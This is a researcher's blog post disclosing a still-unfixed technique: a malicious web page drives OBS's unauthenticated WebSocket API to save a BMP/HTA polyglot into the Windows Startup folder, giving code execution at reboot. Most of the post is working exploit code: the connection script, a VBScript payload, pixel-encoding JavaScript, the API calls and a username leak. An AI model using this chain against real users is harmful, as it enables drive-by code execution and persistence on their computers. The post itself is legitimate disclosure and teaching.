OBS WebSocket to RCE | Jorian Woltjer

One day while playing around with the settings in OBS (Open Broadcaster Software), an open-source desktop recording/live streaming program, I noticed an interesting feature called WebSocket Server. This raised my eyebrows with suspicion, and sure enough, it was accessible from the browser and could lead to RCE through some image and file format wizardry.

This "vulnerability" is not going to be fixed, it is more an abuse of the features available. While I think there is a simple fix, I have not received any reply from the OBS maintainers's security contact in 3 months. At this point, I think the technique is interesting enough to warrant a blog post, as it may help exploit many more issues on Windows.

WebSockets & Auth

As the name suggests, the WebSocket Server uses pigeons to... just kidding, of course, it uses WebSockets. These are made for, well, the Web, often used in the browser to have a two-way communication channel with the server. OBS uses this to let simple programs on your computer interact with scenes, layers, and other things. Below is the default, safe, configuration:

Configuration screen for WebSocket server in OBS with authentication enabled

Notice the ☑️ checked box before Enable Authentication. This checkbox does a lot of heavy lifting, a randomly generated password under Server Password is then required by any program that wants to connect to OBS. This is securely implemented in a challenge-response mechanism.

You can, however, choose not to use authentication, or set a custom but simpler password. Doing this or leaking the password somewhere is problematic because an attacker may now be able to impersonate a legitimate client, and interact with OBS.

Connecting from the Browser

Let's say for simplicity that you completely disable authentication, it's only one click away after all, and makes implementing that cool script of yours much easier. You decide to browse the web a little with OBS in the background and suddenly encounter a website by some malicious actor. What can they do?

Because the protocol is simply WebSockets, it is intentionally accessible from anywhere in the browser. Using the obs-websocket-js library to spare you some implementation troubles, you can connect to localhost:4455:

<script src="https://cdn.jsdelivr.net/npm/obs-websocket-js"></script>
<script>
  let obs;
  (async () => {
    obs = new OBSWebSocket();
    await obs.connect("ws://localhost:4455");
  })();
</script>

Via the obs interface we can now send commands and receive responses from the server with obs.call(). These are all documented in the "Requests" section of the documentation. There are over 100+ of them that we are now able to call however we want. This ranges from messing with the stream's settings to adding elements and scenes. But can we achieve more?

File Write polyglot to RCE

One request that stands out is SaveSourceScreenshot. It has some options for the sourceName, imageFormat, and imageFilePath being the path the screenshot is saved to. The example (C:\Users\user\Desktop\screenshot.png) shows that it should be an absolute path to anywhere on the system. This is starting to sound dangerous.

Let's try calling it to see what happens. The documentation tells us to "Use GetVersion to get compatible image formats" first, so that's step one:

> (await obs.call("GetVersion")).supportedImageFormats
< ['bmp', 'cur', 'icns', 'ico', 'jpeg', 'jpg', 'pbm', 'pgm', 'png', 'ppm', 'tif', 'tiff', 'wbmp', 'webp', 'xbm', 'xpm']

There are enough formats to choose from, we'll start with png being the one also used in the example. We can now call something like the following with an existing scene name to save a screenshot of it to the desktop:

await obs.call("SaveSourceScreenshot", {
  sourceName: "some-source",
  imageFilePath: "C:\\Users\\Jorian\\Desktop\\test.png",
  imageFormat: "png",
});

Image of source text on desktop after calling

This worked nicely, but can we also give it a more malicious extension than .png, such as .exe?
We sure can! But Windows doesn't like an EXE with the content of a PNG.

Error message from windows after opening .exe

If we look at the file contents, it is still a regular PNG, just with a different extension. This format must come from imageFormat of which we have plenty.

$ file test.exe
test.exe: PNG image data, 1266 x 264, 8-bit/color RGBA, non-interlaced

The bytes in this file are completely random though. Would there really be a way to make an executable that's at the same time an image? We can look at the file formats by Ange Albertini, but we are pretty limited, OBS itself generates the image file. We only have the pixels to control what is put into the resulting file and almost all modern image formats use compression, making this very complicated to control arbitrarily. Not to mention most files require magic bytes to be recognized, which will always be taken up by the image metadata.

This time, luckily there is an old leftover format that nobody uses these days but is perfect for controlling the data: BMP. The Bitmap file format is a very simple one, especially its "pixel array" variant which OBS uses when you save an image as bmp, as it uses no compression.

Binary poster by Ange Albertini of the BMP 3 file format

As you can see above, it stores BGR values one by one as separate bytes. If the first pixel is colored #726f4a and the second pixel #6e6169, its BGR values will turn into the bytes 4a 6f 72 69 61 6e, or "Jorian". As you can see, this allows us to write arbitrary data around 60 bytes into the file, before that there is still some annoying metadata.

On Linux, this would already be enough to cause quite some impact by overwriting ~/.ssh/authorized_keys, some bash scripts, or even libaries. On Windows, there is unfortunately much less to find online. We have to come up with a solution ourselves. With standard formats like .exe, there is no chance of such a polyglot ever happening. Our best bet may be to find some obscure configuration file to overwrite?

My mind got fixated on the startup folder though, it's just right there for us to place a malicious payload in that will be executed whenever the computer starts up. Any file with any extension in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup will be run with the default program. What are our options?

Binary formats are pretty quickly out of the picture, and scripting languages like VBS won't be able to handle the special characters in the metadata, they will error out before doing anything useful. Other existing formats parse backward where the header doesn't matter, like ZIP (of which I actually received a real life binary poster from Ange after I told him this story in person at CCC :D). These don't happen to have any security impact if forcefully opened at startup, though.

At one point I vaguely remembered seeing some malware written using an HTML-like format with malicious scripts. After a lot of searching, I found it again, .hta (HTML Application). The file content looks something like this:

<HTML>
<BODY>
<H1>Hello, world!</H1>
</BODY>
</HTML>

And looking for malicious uses of it, you can quickly find how using a <script> tag, it can run arbitrary shell commands:

<script language="VBScript">
  Set shell = CreateObject("wscript.Shell")
  shell.run "calc"
</script>

The beautiful thing about this format is, that its parsing is as lax as regular HTML, so random bytes before and after are just seen as text! The parser only cares about tags like <script>...</script> embedded inside the content, whose content will be executed as VBScript. Let's make an example with some garbage content around it that still executes the calculator, before quickly closing itself. We'll name the file payload.hta:

BMP!#? aG93IHlvdSBkb2luZz8
*()(**!^#@!)AAAAAAAAAAAAAA
<script language="VBScript">
  Set shell = CreateObject("wscript.Shell")
  shell.run "calc"
  Window.Close
</script>
0123?$$$

Running this file automatically opens with "Microsoft HTML Application host", whatever that may be, but the important part is that it successfully executes our payload opening the calculator!

That means all we have to do is embed this string somewhere in our BMP data as blue, green, and red pixels, which we then save to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\payload.hta. The moment the user restarts their computer, our payload will execute.

We have this nice theory about writing an image with specific pixels, but we still need to gain control over that image data. The WebSocket API makes it possible to screenshot a source. A source is just one element in a scene, and we can create such elements ourselves. There are loads of options but an easy one to get the most control is a browser source (CreateInput), which literally renders HTML. This allows us to render a base64 image with the exact pixels we need.

Here's an implementation in JavaScript that converts the string into bytes, into pixels, and then into a base64 data: image URL. This is sent to OBS as a browser source with a URL being another data: URL, this time of type text/html, returning just an image with the pixel data.

const payload = `\
<script language="VBScript">
  Set shell = CreateObject("wscript.Shell")
  shell.run "calc"
  Window.Close
<\/script>`;
const bytes = new TextEncoder().encode(payload);
// Generate an image with the required pixels
const pixels = [];
for (let i = 0; i < bytes.length; i += 3) {
  const b = bytes[i] || 0;
  const g = bytes[i + 1] || 0;
  const r = bytes[i + 2] || 0;
  pixels.push(`rgb(${r}, ${g}, ${b})`);
}
const canvas = document.createElement("canvas");
canvas.width = pixels.length;
canvas.height = 1;
const context = canvas.getContext("2d");
for (let c = 0; c < canvas.width; c++) {
  context.fillStyle = pixels[c];
  context.fillRect(c, 0, 1, 1);
}
const imgUrl = canvas.toDataURL("image/png");
// Create browser source with image pixels
await obs.call("CreateInput", {
  sceneName: "some-scene",
  inputName: "hacker-source",
  inputKind: "browser_source",
  inputSettings: { url: `data:text/html,<img src="${imgUrl}" />`, width: pixels.length, height: 1 },
});

We then call SaveSourceScreenshot on the created source to save it to the startup folder:

await obs.call("SaveSourceScreenshot", {
  sourceName: "hacker-source",
  imageFilePath: "C:\\Users\\Jorian\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.hta",
  imageFormat: "bmp",
});

Checking out our startup folder, sure enough, the file was created:

Hexdump of file showing HTA script tag, and image being some pixels

It has the content we expect from our carefully crafted pixels, and double-clicking it will now open the calculator. So will restarting!

Final Exploit

I glossed over one detail, getting the path to the startup folder. Here I wrote to C:\Users\Jorian because I know my own name, but we can't assume that for any random user on our website who we want to exploit. We have a lot of APIs still available, though, surely one makes it possible to leak the username right?

Well, there's no easy GetUsername command unfortunately, but we got the next best thing: GetRecordDirectory. This is useful because the default record directory is in the user's home folder! We can simply request it and parse out the username from the path.

const { recordDirectory } = await obs.call("GetRecordDirectory");
console.log("Record directory:", recordDirectory);  // 'C:\\Users\\Jorian\\Videos'
const username = recordDirectory.replaceAll("\\", "/").match(/\/Users\/([^\/]+)\//)[1];
console.log("Username:", username);  // 'Jorian'

We also hardcoded the sceneName earlier to a scene created manually, but we cannot assume a scene named "some-scene" exists on any target. Therefore, we should call GetCurrentProgramScene to receive the current scene name and add a source to that. To clean up after the fact RemoveInput can remove our created browser source.

const { currentProgramSceneName } = await obs.call("GetCurrentProgramScene");
console.log(currentProgramSceneName);  // 'My Scene'
...
await obs.call("RemoveInput", {
  inputName: "hacker-source",
});

Altogether, we now have a script that:

Connects to ws://localhost:4455 to control OBS, first fetching the record directory to extract the Windows username and current scene name
Generates an image with blue, green, and red pixels with data from a VBScript payload
Creates a browser source that displays the image using a data: URL
Writes the loaded source to the user's startup folder as an HTA file
Cleans itself up, leaving no trace but the payload that executes once the user restarts

The following gist combines all this logic into one:

https://gist.github.com/JorianWoltjer/342149caf21819499cb8cfea947d18c4

Running it, you can see the WebSocket messages quickly going back and forth in the console, and maybe even some temporary elements being created in your current OBS scene.

Browser console showing logging output and websocket messages

After restarting, the payload triggers and we see that classic calculator pop up:

Calculator open over insecure OBS configuration

We successfully exploited an authenticated RCE, where the user is one click away from misconfiguring it (disabling authentication). If you're a developer using the WebSocket API, make sure to set a randomly generated password and don't take shortcuts. Tell your users to do the same.

It's always a battle of usability and security. I have of course reported this in an issue and later directly to the maintainers, but with no real response. If you like these client-side RCEs, I would like to shout out Bálint who has a stunning-looking blog with some similarly cool vulnerabilities. Otherwise, go find some stuff like this on your own, it's very fun exploring the ways you can hack yourself!